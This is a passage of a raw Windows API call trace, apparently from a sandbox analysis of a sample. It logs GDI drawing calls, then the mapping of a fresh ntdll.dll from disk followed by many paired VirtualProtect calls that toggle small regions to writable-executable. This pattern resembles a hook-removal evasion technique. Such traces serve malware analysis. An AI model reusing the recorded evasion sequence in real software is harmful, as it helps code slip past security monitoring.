hdcSrc=0x24010612, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.036] SetBkColor (hdc=0x24010612, color=0xffffff) returned 0xffffff [0043.036] ExtTextOutW (hdc=0x24010612, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.036] DrawThemeBackground () returned 0x0 [0043.036] DrawThemeEdge () returned 0x0 [0043.036] StretchBlt (hdcDest=0x1f0107d7, xDest=640, yDest=0, wDest=64, hDest=64, hdcSrc=0x24010612, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.036] SetBkColor (hdc=0x24010612, color=0xffffff) returned 0xffffff [0043.036] ExtTextOutW (hdc=0x24010612, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.036] DrawThemeBackground () returned 0x0 [0043.036] DrawThemeEdge () returned 0x0 [0043.036] StretchBlt (hdcDest=0x1f0107d7, xDest=704, yDest=0, wDest=64, hDest=64, hdcSrc=0x24010612, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.036] SetBkColor (hdc=0x24010612, color=0xffffff) returned 0xffffff [0043.036] ExtTextOutW (hdc=0x24010612, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.036] SetBkColor (hdc=0x24010612, color=0xffffff) returned 0xffffff [0043.036] ExtTextOutW (hdc=0x24010612, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.036] DrawThemeBackground () returned 0x0 [0043.036] DrawThemeEdge () returned 0x0 [0043.036] StretchBlt (hdcDest=0x1f0107d7, xDest=832, yDest=0, wDest=64, hDest=64, hdcSrc=0x24010612, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.036] SetBkColor (hdc=0x24010612, color=0xffffff) returned 0xffffff [0043.036] ExtTextOutW (hdc=0x24010612, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.036] DrawThemeBackground () returned 0x0 [0043.037] DrawThemeEdge () returned 0x0 [0043.037] StretchBlt (hdcDest=0x1f0107d7, xDest=896, yDest=0, wDest=64, hDest=64, hdcSrc=0x24010612, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.037] SetBkColor (hdc=0x24010612, color=0xffffff) returned 0xffffff [0043.037] ExtTextOutW (hdc=0x24010612, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.037] DrawThemeBackground () returned 0x0 [0043.037] DrawThemeEdge () returned 0x0 [0043.037] StretchBlt (hdcDest=0x1f0107d7, xDest=960, yDest=0, wDest=64, hDest=64, hdcSrc=0x24010612, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.037] CloseThemeData () returned 0x0 [0043.037] SelectObject (hdc=0x24010612, h=0x85000f) returned 0x740507e9 [0043.037] SelectObject (hdc=0x1f0107d7, h=0x85000f) returned 0x5a050527 [0043.037] ImageList_Add (himl=0x54b640, hbmImage=0x5a050527, hbmMask=0x0) returned 0 [0043.041] DeleteDC (hdc=0x24010612) returned 1 [0043.041] DeleteObject (ho=0x740507e9) returned 1 [0043.041] DeleteDC (hdc=0x1f0107d7) returned 1 [0043.041] DeleteObject (ho=0x5a050527) returned 1 [0043.041] ReleaseDC (hWnd=0x502c4, hDC=0x10105c7) returned 1 [0043.041] ActivateActCtx (in: hActCtx=0x5325c4, lpCookie=0x19ec84 | out: hActCtx=0x5325c4, lpCookie=0x19ec84) returned 1 [0043.041] GetProcAddress (hModule=0x73af0000, lpProcName="ImageList_GetImageCount") returned 0x73b6ec80 [0043.042] ImageList_GetImageCount (himl=0x54a248) returned 16 [0043.042] DeactivateActCtx (dwFlags=0x0, ulCookie=0x107e0019) returned 1 [0043.042] SetScrollInfo (hwnd=0x502c4, nBar=0, lpsi=0x19ece0, redraw=1) returned 0 [0043.058] CallWindowProcW (lpPrevWndFunc=0x73de0140, hWnd=0x502c4, Msg=0x5, wParam=0x0, lParam=0xae01be) returned 0x0 [0043.058] CallWindowProcW (lpPrevWndFunc=0x73de0140, hWnd=0x502c4, Msg=0x3, wParam=0x0, lParam=0x2b0011) returned 0x0 [0043.059] CallWindowProcW (lpPrevWndFunc=0x77415750, hWnd=0x302dc, Msg=0x210, wParam=0x3e70001, lParam=0x502c4) returned 0x0 [0043.059] CallWindowProcW (lpPrevWndFunc=0x73de0140, hWnd=0x502c4, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0043.059] DeactivateActCtx (dwFlags=0x0, ulCookie=0x107e0017) returned 1 [0043.059] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x73af0000 [0043.060] GetProcAddress (hModule=0x73af0000, lpProcName="DllGetVersion") returned 0x73bafd60 [0043.061] DllGetVersion () returned 0x0 [0043.061] FreeLibrary (hLibModule=0x73af0000) returned 1 [0043.061] IsAppThemed () returned 0x1 [0120.529] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x19f3b8 | out: DllHandle=0x19f3b8*=0x74030000) returned 0x0 [0120.529] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77390000 [0120.530] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x19f3b8 | out: DllHandle=0x19f3b8*=0x74030000) returned 0x0 [0120.530] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77390000 [0120.531] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x19f3b8 | out: DllHandle=0x19f3b8*=0x74030000) returned 0x0 [0120.531] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77390000 [0120.531] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x19f410 | out: DllHandle=0x19f410*=0x74030000) returned 0x0 [0120.532] CreateFileW (lpFileName="C:\\WINDOWS\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x24c [0120.544] NtCreateSection (in: SectionHandle=0x19f450, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x0, SectionPageProtection=0x2, AllocationAttributes=0x1000000, FileHandle=0x24c | out: SectionHandle=0x19f450*=0x250) returned 0x0 [0120.545] NtMapViewOfSection (in: SectionHandle=0x250, ProcessHandle=0xffffffff, BaseAddress=0x19f4fc*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19f45c*=0x18e000, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x2 | out: BaseAddress=0x19f4fc*=0x24e0000, SectionOffset=0x0, ViewSize=0x19f45c*=0x18e000) returned 0x40000003 [0120.546] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x19f3b8 | out: DllHandle=0x19f3b8*=0x74030000) returned 0x0 [0120.546] VirtualProtect (in: lpAddress=0x24e1004, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.546] VirtualProtect (in: lpAddress=0x24e1004, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.681] VirtualProtect (in: lpAddress=0x24e100c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.681] VirtualProtect (in: lpAddress=0x24e100c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.681] VirtualProtect (in: lpAddress=0x24e1014, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.681] VirtualProtect (in: lpAddress=0x24e1014, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.681] VirtualProtect (in: lpAddress=0x24e101c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.681] VirtualProtect (in: lpAddress=0x24e101c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.682] VirtualProtect (in: lpAddress=0x24e1024, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.682] VirtualProtect (in: lpAddress=0x24e1024, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.682] VirtualProtect (in: lpAddress=0x24e102c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.682] VirtualProtect (in: lpAddress=0x24e102c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.682] VirtualProtect (in: lpAddress=0x24e1034, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.682] VirtualProtect (in: lpAddress=0x24e1034, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.682] VirtualProtect (in: lpAddress=0x24e103c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.683] VirtualProtect (in: lpAddress=0x24e103c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.683] VirtualProtect (in: lpAddress=0x24e1044, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.683] VirtualProtect (in: lpAddress=0x24e1044, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.683] VirtualProtect (in: lpAddress=0x24e104c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.683] VirtualProtect (in: lpAddress=0x24e104c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.683] VirtualProtect (in: lpAddress=0x24e1054, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.684] VirtualProtect (in: lpAddress=0x24e1054, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.684] VirtualProtect (in: lpAddress=0x24e105c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.684] VirtualProtect (in: lpAddress=0x24e105c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.684] VirtualProtect (in: lpAddress=0x24e1064, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.684] VirtualProtect (in: lpAddress=0x24e1064, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.684] VirtualProtect (in: lpAddress=0x24e106c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.685] VirtualProtect (in: lpAddress=0x24e106c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.685] VirtualProtect (in: lpAddress=0x24e1074, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.685] VirtualProtect (in: lpAddress=0x24e1074, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.685] VirtualProtect (in: lpAddress=0x24e107c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.685] VirtualProtect (in: lpAddress=0x24e107c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.685] VirtualProtect (in: lpAddress=0x24e1084, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.685] VirtualProtect (in: lpAddress=0x24e1084, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.686] VirtualProtect (in: lpAddress=0x24e108c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.686] VirtualProtect (in: lpAddress=0x24e108c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.686] VirtualProtect (in: lpAddress=0x24e1094, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.686] VirtualProtect (in: lpAddress=0x24e1094, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.686] VirtualProtect (in: lpAddress=0x24e109c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.686] VirtualProtect (in: lpAddress=0x24e109c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.686] VirtualProtect (in: lpAddress=0x24e10a4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.687] VirtualProtect (in: lpAddress=0x24e10a4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.687] VirtualProtect (in: lpAddress=0x24e10ac, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.687] VirtualProtect (in: lpAddress=0x24e10ac, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.687] VirtualProtect (in: lpAddress=0x24e10b4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.687] VirtualProtect (in: lpAddress=0x24e10b4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.687] VirtualProtect (in: lpAddress=0x24e10c0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.687] VirtualProtect (in: lpAddress=0x24e10c0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.688] VirtualProtect (in: lpAddress=0x24e10d0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.688] VirtualProtect (in: lpAddress=0x24e10d0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.688] VirtualProtect (in: lpAddress=0x24e10d4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.688] VirtualProtect (in: lpAddress=0x24e10d4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.688] VirtualProtect (in: lpAddress=0x24e10dc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.688] VirtualProtect (in: lpAddress=0x24e10dc, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.688] VirtualProtect (in: lpAddress=0x24e10e4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.689] VirtualProtect (in: lpAddress=0x24e10e4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.689] VirtualProtect (in: lpAddress=0x24e10ec, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.689] VirtualProtect (in: lpAddress=0x24e10ec, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.689] VirtualProtect (in: lpAddress=0x24e10f4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.689] VirtualProtect (in: lpAddress=0x24e10f4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.689] VirtualProtect (in: lpAddress=0x24e10fc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.690] VirtualProtect (in: lpAddress=0x24e10fc, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.690] VirtualProtect (in: lpAddress=0x24e1100, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.690] VirtualProtect (in: lpAddress=0x24e1100, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.690] VirtualProtect (in: lpAddress=0x24e1104, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.690] VirtualProtect (in: lpAddress=0x24e1104, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.690] VirtualProtect (in: lpAddress=0x24e1108, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.690] VirtualProtect (in: lpAddress=0x24e1108, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.690] VirtualProtect (in: lpAddress=0x24e110c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.691] VirtualProtect (in: lpAddress=0x24e110c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.691] VirtualProtect (in: lpAddress=0x24e1110, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.691] VirtualProtect (in: lpAddress=0x24e1110, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.691] VirtualProtect (in: lpAddress=0x24e1114, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.691] VirtualProtect (in: lpAddress=0x24e1114, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.691] VirtualProtect (in: lpAddress=0x24e1118, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.692] VirtualProtect (in: lpAddress=0x24e1118, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.692] VirtualProtect (in: lpAddress=0x24e111c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.692] VirtualProtect (in: lpAddress=0x24e111c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.692] VirtualProtect (in: lpAddress=0x24e1120, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.692] VirtualProtect (in: lpAddress=0x24e1120, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.692] VirtualProtect (in: lpAddress=0x24e1124, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.692] VirtualProtect (in: lpAddress=0x24e1124, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.693] VirtualProtect (in: lpAddress=0x24e1128, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.693] VirtualProtect (in: lpAddress=0x24e1128, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.693] VirtualProtect (in: lpAddress=0x24e112c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.693] VirtualProtect (in: lpAddress=0x24e112c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.693] VirtualProtect (in: lpAddress=0x24e1130, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.693] VirtualProtect (in: lpAddress=0x24e1130, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.693] VirtualProtect (in: lpAddress=0x24e1134, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.694] VirtualProtect (in: lpAddress=0x24e1134, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.694] VirtualProtect (in: lpAddress=0x24e1138, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.694] VirtualProtect (in: lpAddress=0x24e1138, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.694] VirtualProtect (in: lpAddress=0x24e113c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.694] VirtualProtect (in: lpAddress=0x24e113c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.694] VirtualProtect (in: lpAddress=0x24e1144, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.694] VirtualProtect (in: lpAddress=0x24e1144, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.695] VirtualProtect (in: lpAddress=0x24e1148, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.695] VirtualProtect (in: lpAddress=0x24e1148, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.695] VirtualProtect (in: lpAddress=0x24e114c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.695] VirtualProtect (in: lpAddress=0x24e114c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.695] VirtualProtect (in: lpAddress=0x24e1154, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.695] VirtualProtect (in: lpAddress=0x24e1154, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.696] VirtualProtect (in: lpAddress=0x24e1158, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.696] VirtualProtect (in: lpAddress=0x24e1158, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.696] VirtualProtect (in: lpAddress=0x24e115c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.696] VirtualProtect (in: lpAddress=0x24e115c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.696] VirtualProtect (in: lpAddress=0x24e1178, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.696] VirtualProtect (in: lpAddress=0x24e1178, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.696] VirtualProtect (in: lpAddress=0x24e1194, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.697] VirtualProtect (in: lpAddress=0x24e1194, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.697] VirtualProtect (in: lpAddress=0x24e11b0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.697] VirtualProtect (in: lpAddress=0x24e11b0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.697] VirtualProtect (in: lpAddress=0x24e11cc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.697] VirtualProtect (in: lpAddress=0x24e11cc, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.697] VirtualProtect (in: lpAddress=0x24e11e8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.697] VirtualProtect (in: lpAddress=0x24e11e8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.698] VirtualProtect (in: lpAddress=0x24e11f0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: 